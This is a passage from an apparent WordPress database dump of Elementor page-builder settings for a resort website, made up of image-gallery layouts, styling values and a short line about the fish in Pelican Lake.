htness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_border_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"288c56e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"eae_slider_custom_overlay_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"eae_slider_custom_overlay_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"eae_slider_custom_overlay_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"eae_slider_custom_overlay_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"eae_slider_custom_overlay_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"eae_slider_delay\":\"5000\",\"gradient_background_angle\":{\"unit\":\"deg\",\"size\":-45,\"sizes\":[]},\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"2fdbe18\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"984dd77\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"7d5d219\"}],\"background_overlay_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_overlay_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5,\"sizes\":[]},\"css_filters_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_overlay_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_hover_opacity\":{\"unit\":\"px\",\"size\":0.5,\"sizes\":[]},\"css_filters_hover_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_hover_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"border_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]}},\"elements\":[{\"id\":\"9ca33fb\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/boxmeyer-group.jpg\",\"id\":279},\"width\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"opacity\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"css_filters_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"opacity_hover\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"css_filters_hover_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_hover_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_border_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5b3d678\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"3442456\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"22ea8d6\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"34881c4\"}]},\"elements\":[{\"id\":\"58b2643\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"b073176\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"26e79f9\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"a64f106\"}]},\"elements\":[{\"id\":\"f687d69\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Pelican lake has wonderful walleye, bass, northern, crappie and sunfish.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2256,84,'_elementor_edit_mode','builder'),(2257,84,'_elementor_template_type','post'),(2258,84,'_elementor_version','2.5.13'),(2267,84,'_elementor_page_settings','a:12:{s:21:\"background_color_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:23:\"background_color_b_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:25:\"background_gradient_angle\";a:3:{s:4:\"unit\";s:3:\"deg\";s:4:\"size\";i:180;s:5:\"sizes\";a:0:{}}s:15:\"background_xpos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:15:\"background_ypos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:19:\"background_bg_width\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}}'),(2268,84,'_elementor_data','[{\"id\":\"0baf26c\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"a4b43ad\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"8fb3ea0\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"4231fed\"}]},\"elements\":[{\"id\":\"19d9417\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"ac7ec76\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"8bd0ae5\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"91e75b6\"}]},\"elements\":[{\"id\":\"81325aa\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/leonturkey02.jpg\",\"id\":366}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"321776c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"03266c3\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"593f499\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"b6736dd\"}]},\"elements\":[{\"id\":\"3d48323\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/Deerhunter-065.jpg\",\"id\":343}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"7aa2a0a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"24419d9\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"aec2367\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"a298885\"}]},\"elements\":[{\"id\":\"c1f31b2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN3161.jpg\",\"id\":188}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"14a434b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"e3874bd\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"e008914\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"2d50505\"}]},\"elements\":[{\"id\":\"4f5ddd6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN3219.jpg\",\"id\":189}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4cab9d7\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"66a94d7\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"ffe949d\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"c1b04eb\"}]},\"elements\":[{\"id\":\"cd5ac64\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"a810255\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"0e555dd\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"87dfb44\"}]},\"elements\":[{\"id\":\"39dad3c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN2438.jpg\",\"id\":186}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"982dd4f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"09f68f0\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"3c62856\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"bd1e331\"}]},\"elements\":[{\"id\":\"aee3ca8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN2428.jpg\",\"id\":185}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"bd08d9d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"1522532\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"ea8fb08\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"541e9b5\"}]},\"elements\":[{\"id\":\"18b5237\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSC0273.jpg\",\"id\":484}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4f0a32d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"630307b\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"a8994d3\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"729ee77\"}]},\"elements\":[{\"id\":\"5c2aa43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3982.jpg\",\"id\":498}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ff003c5\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"custom_height\":{\"unit\":\"px\",\"size\":400,\"sizes\":[]},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"custom_height_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover